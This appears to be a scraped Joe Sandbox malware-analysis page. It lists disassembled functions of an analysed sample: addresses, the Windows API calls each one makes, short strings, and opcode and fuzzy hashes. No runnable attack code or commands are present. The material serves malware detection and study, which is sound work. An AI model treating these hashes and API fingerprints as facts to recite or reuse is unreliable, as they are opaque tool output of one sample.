Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: HeapThread$CloseCurrentDebugErrorFreeHandleLastOpenOutputProcessString
String ID: ******
API String ID: 2450575844-1974978773
Opcode ID: a615dbd2ae5ccc97e5f02d8bab2d06328ec7d4b9a372332ff70091f070a2f016
Instruction ID: 8a9e233426850eda64e1f5128e765e615bddae31fa46ce39685b5e67f2a37fdf
Opcode Fuzzy Hash: a615dbd2ae5ccc97e5f02d8bab2d06328ec7d4b9a372332ff70091f070a2f016
Instruction Fuzzy Hash: D3315A786007019FC7189B24D884BAB77B4AF85742F15867EE88997350DB34A811CF6B

Function 0047E640 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77libraryloaderCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047E6B7
GetVersionExW.KERNEL32 ref: 0047E6D2
GetVersionExW.KERNEL32(?), ref: 0047E6E5
GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 0047E6F5
GetProcAddress.KERNEL32(00000000), ref: 0047E6FC

Strings

GetNativeSystemInfo, xrefs: 0047E6EB
kernel32.dll, xrefs: 0047E6F0

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Version$AddressHandleModuleProc_memset
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 3011030232-192647395
Opcode ID: 9f8ff7a418be1d7efb5618ce7a2fccf31ce151ade9ce7797f9bfbbf4b54cd3c4
Instruction ID: af40fee38c0cad752181b75b97ecc5d2eae555b021b8fd5725ab18872ef9ea95
Opcode Fuzzy Hash: 9f8ff7a418be1d7efb5618ce7a2fccf31ce151ade9ce7797f9bfbbf4b54cd3c4
Instruction Fuzzy Hash: 85214BB09043418FD754EF7AD881BDB7BE4AB8C704F844A6EE55CC2290E778D5488F9A

Function 0047A0E0 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(C1DE166F), ref: 0047A10A
HeapLock.KERNEL32(00000000), ref: 0047A130
HeapWalk.KERNEL32(00000000,?), ref: 0047A14A
HeapWalk.KERNEL32(00000000,?), ref: 0047A17E
HeapUnlock.KERNEL32(00000000), ref: 0047A192

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Heap$Walk$LockProcessUnlock
String ID:
API String ID: 2227978497-0
Opcode ID: 81c1e659d896c1b8b40812ab09a17c939bf94fdb85d8e5b5ee7bdaf731dcfabe
Instruction ID: bbe46ce4e01aed47a1f70f3d08ba4753ccc444e6a795538b985fec849003399e
Opcode Fuzzy Hash: 81c1e659d896c1b8b40812ab09a17c939bf94fdb85d8e5b5ee7bdaf731dcfabe
Instruction Fuzzy Hash: 6C21D1325083419FE311DF29D844A9FB7E8EBC5661F80462FF84593390D739A945CBAB

Function 0046D300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,004C0CB4,00000010), ref: 0046D388
_memset.LIBCMT ref: 0046D332

Part of subcall function 00449CF0: InterlockedCompareExchange.KERNEL32(004E700C,00000001,00000000), ref: 00449CF9

FindNextFileW.KERNEL32(00000000,?,?,004C0CB4,00000010), ref: 0046D41D

Strings

., xrefs: 0046D3A0

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFind$CompareExchangeFirstInterlockedNext_memset
String ID: .
API String ID: 2012847224-248832578
Opcode ID: d407b2fb326dcf6b2c68ae202e0280be0ddeac5ff59a685d36491a2aa2599f47
Instruction ID: 935c810532cfe2b7f36e7f56f8176e21ba366019f0deec775d2318cc497d1741
Opcode Fuzzy Hash: d407b2fb326dcf6b2c68ae202e0280be0ddeac5ff59a685d36491a2aa2599f47
Instruction Fuzzy Hash: 2F317030F005549FCB20EB59DC84ABF73B4EB84324F5405AAE90997391EB785DC58B9E

Function 0044A940 Relevance: 5.4, Strings: 4, Instructions: 392COMMON

Download Yara Rule

Strings

version, xrefs: 0044A9CE
logs, xrefs: 0044ACF9
date, xrefs: 0044AA9F
path, xrefs: 0044ABDD

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memcpy_s
String ID: date$logs$path$version
API String ID: 2001391462-1468544551
Opcode ID: ffeedcf09fd024d02930604d4351f1d9c4e20f5f3bc065c2dab0befd4e08b293
Instruction ID: 78fcfeb3040343104aede56ec2e0158854f21d25d4d16607a0e9590502c573f4
Opcode Fuzzy Hash: ffeedcf09fd024d02930604d4351f1d9c4e20f5f3bc065c2dab0befd4e08b293
Instruction Fuzzy Hash: 70026C75D00258CFDB14CF99C884ADDBBB2FF85304F2981AEC40A6B356D774AA49CB91

Function 00484124 Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29590a81b3251fca5755b7757f13a5cb89c93322baddac7ebbf6560387a82461
Instruction ID: 6cab1a8e8fef37a9c9f4059041024890a40a3f1f8d344ed13e853b53ff9a7377
Opcode Fuzzy Hash: 29590a81b3251fca5755b7757f13a5cb89c93322baddac7ebbf6560387a82461
Instruction Fuzzy Hash: C8F0313150010EBBDF017F71DC0C9AF3B6DAB90394B048926F91595160EB38DA96EB99

Function 0044AA07 Relevance: 4.1, Strings: 3, Instructions: 334COMMON

Download Yara Rule

Strings

logs, xrefs: 0044ACF9
date, xrefs: 0044AA9F
path, xrefs: 0044ABDD

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: date$logs$path
API String ID: 0-3116124417
Opcode ID: 133996de80c348e9e78970d64dc1b6be4ecb56c10107aac29467756af1daac31
Instruction ID: 9328a4e24000ddc87a463375ed416296aa69c017df2c73b6a2e59af4a77eedd7
Opcode Fuzzy Hash: 133996de80c348e9e78970d64dc1b6be4ecb56c10107aac29467756af1daac31
Instruction Fuzzy Hash: D9E16B75D002588FEB08CF95C8846DDBBB2FF85304F2981AEC50A6B356D774AA49CB91

Function 0044AA09 Relevance: 4.1, Strings: 3, Instructions: 334COMMON

Download Yara Rule

Strings

logs, xrefs: 0044ACF9
date, xrefs: 0044AA9F
path, xrefs: 0044ABDD

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: date$logs$path
API String ID: 0-3116124417
Opcode ID: ec7cae6e4f198182df5be47fd8c01c696eba71d10eca4738416a41d04dbed728
Instruction ID: 9e8fb5e346565543a85397cbcd1c4803d80c2448331f02fea9e916978b3e101d
Opcode Fuzzy Hash: ec7cae6e4f198182df5be47fd8c01c696eba71d10eca4738416a41d04dbed728
Instruction Fuzzy Hash: D2E16B75D00258CFDB08CF95C8846DDBBB2FF85304F2981AEC50A6B356D774AA49CB91

Function 004AA320 Relevance: 3.9, Strings: 3, Instructions: 110COMMON

Download Yara Rule

Strings

GenuineIotel, xrefs: 004AA3B2
GenuineIntel, xrefs: 004AA3EF
%s:%08x, xrefs: 004AA429

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: %s:%08x$GenuineIntel$GenuineIotel
API String ID: 0-2468691418
Opcode ID: 5e00549dddc417758d175cd5b247fcdac5164947a460c6fc2e8f035a4589b6d0
Instruction ID: ef081f72bb4cdc7e24380d7e12c50f566dd41fe1eeb303efa9d2195161100e9f
Opcode Fuzzy Hash: 5e00549dddc417758d175cd5b247fcdac5164947a460c6fc2e8f035a4589b6d0
Instruction Fuzzy Hash: D7419271D142499FCB11CFB8C8807EEBBB5EF6A310F14816AE815A7341E7388905CB65

Function 0046C990 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000001,0046E219,?,C1DE166F,00000000,?,00000001), ref: 0046C9AF

Strings

\\?\, xrefs: 0046C99D

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFindFirst
String ID: \\?\
API String ID: 1974802433-4282027825
Opcode ID: f493e3ec0c0365d601dda9286fa5ac785f5688808302581b2e02ab17960157f2
Instruction ID: 466355a01e7b825cad4fd529a01952e2af831e9010863f6ae6310193d666d26a
Opcode Fuzzy Hash: f493e3ec0c0365d601dda9286fa5ac785f5688808302581b2e02ab17960157f2
Instruction Fuzzy Hash: 69F09AB56006049F8340CB6DDC85D52B3A8EF8A37532883A9E918DB3A1E635AD00CBA4

Function 00418999 Relevance: 1.6, Strings: 1, Instructions: 346COMMON

Download Yara Rule

Strings

V, xrefs: 0041BE1E

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-433605988
Opcode ID: 76ae3eb703a0602a373f911ac9ad378478f18b5eb0beb1f91b32f166f295b47f
Instruction ID: f8b6643259fef2ad4008a7e23513e40020b8eba216ea984c77515ec0901e6f35
Opcode Fuzzy Hash: 76ae3eb703a0602a373f911ac9ad378478f18b5eb0beb1f91b32f166f295b47f
Instruction Fuzzy Hash: 02E19CB1D056288FEB24CB14CC90BEABBB5EB85311F1441EED84967241DB386EC5CF96

Function 00444920 Relevance: 1.5, APIs: 1, Instructions: 38comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004BC810,00000000,00000001,004C1AFC,?), ref: 0044494F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 167c21f9170c61d7dec070417aeb6f320e46ac321cfd58e7a502725eb0feb4d1
Instruction ID: a6a9f9cc77d7f0a07212dedea549499c41f8e574d5345a7dc29d12e512f086a5
Opcode Fuzzy Hash: 167c21f9170c61d7dec070417aeb6f320e46ac321cfd58e7a502725eb0feb4d1
Instruction Fuzzy Hash: DCF054B7300210ABD7219E5B9C80E43BBA9EBDD774720452EF74897301DA769812D6A8

Function 004208F8 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

, xrefs: 0042168D

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID: 0-399585960
Opcode ID: 139206d703244f9fdc49eadf388b9c3a653b4028f4d110e69bb6445f7a5dc39b
Instruction ID: 5b645a497636a1de9e600b3b5c69b1be11d8b58e577e9b1f5a9b0be0442f5a63
Opcode Fuzzy Hash: 139206d703244f9fdc49eadf388b9c3a653b4028f4d110e69bb6445f7a5dc39b
Instruction Fuzzy Hash: A49106B1E042649FE7248B10EC847EB77B5FF90314F5042FAD84E96681E7785EC1CA52

Function 0041B00F Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

V, xrefs: 0041BE1E

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-433605988
Opcode ID: 2c58f40655a370181f04bf589713ab0d3925715c8787920fb19c652c467edf29
Instruction ID: 9762a4de2aa2e7ea10b03879878c32e374ead6151f177a98a1ef94cf844233f9
Opcode Fuzzy Hash: 2c58f40655a370181f04bf589713ab0d3925715c8787920fb19c652c467edf29
Instruction Fuzzy Hash: EF81E0B2D042259BEB208B60DC94BFBB775EF81310F0541FAE94D56681D3385EC6CBA6

Function 004147B3 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

common, xrefs: 00414841

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: common
API String ID: 0-3857477713
Opcode ID: 5e3db6c1ffe91f925c0d071068069ee6e45b47405032df368c17bf1e641662f8
Instruction ID: aa216b8fcc850d54d0ab7be48bb563fab11601ef7d8982119b17cbbd1da7f8bb
Opcode Fuzzy Hash: 5e3db6c1ffe91f925c0d071068069ee6e45b47405032df368c17bf1e641662f8
Instruction Fuzzy Hash: 097106B2E041249AEB288B14DD80BFB7775EB95310F1081BBE90E67684D67C5EC1CF5A

Function 004188C3 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

V, xrefs: 0041BE1E

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-433605988
Opcode ID: 5071269b6bab0c1dd79dce42214ce1a512198e3082085af673664af89407d0fc
Instruction ID: 7a46a623c87d46e109ed50a76d6406abedb79d86b8dfed5f3f66fb4403ed09e7
Opcode Fuzzy Hash: 5071269b6bab0c1dd79dce42214ce1a512198e3082085af673664af89407d0fc
Instruction Fuzzy Hash: E761E3B1D046189BE7208B25DC84BFB7775EB84304F1081FEE90D66680EB385EC6CA57

Function 004186DD Relevance: 1.4, Strings: 1, Instructions: 185COMMON

Download Yara Rule

Strings

V, xrefs: 0041BE1E

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-433605988
Opcode ID: 757e9ff5c1567e5dfd3476e236039163917a94c3fc185f2058f417f68cb6e385
Instruction ID: 54797916e3dc882b79422f10399017d7d6943fd4398b5e3f05ddd5512805ceb3
Opcode Fuzzy Hash: 757e9ff5c1567e5dfd3476e236039163917a94c3fc185f2058f417f68cb6e385
Instruction Fuzzy Hash: 9A61E6B1D046289AE7208B25DC84BFB7775EB84315F1081FEE90D66680EB7C4EC6CE56

Function 0041C7A7 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

_R, xrefs: 0041C801

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
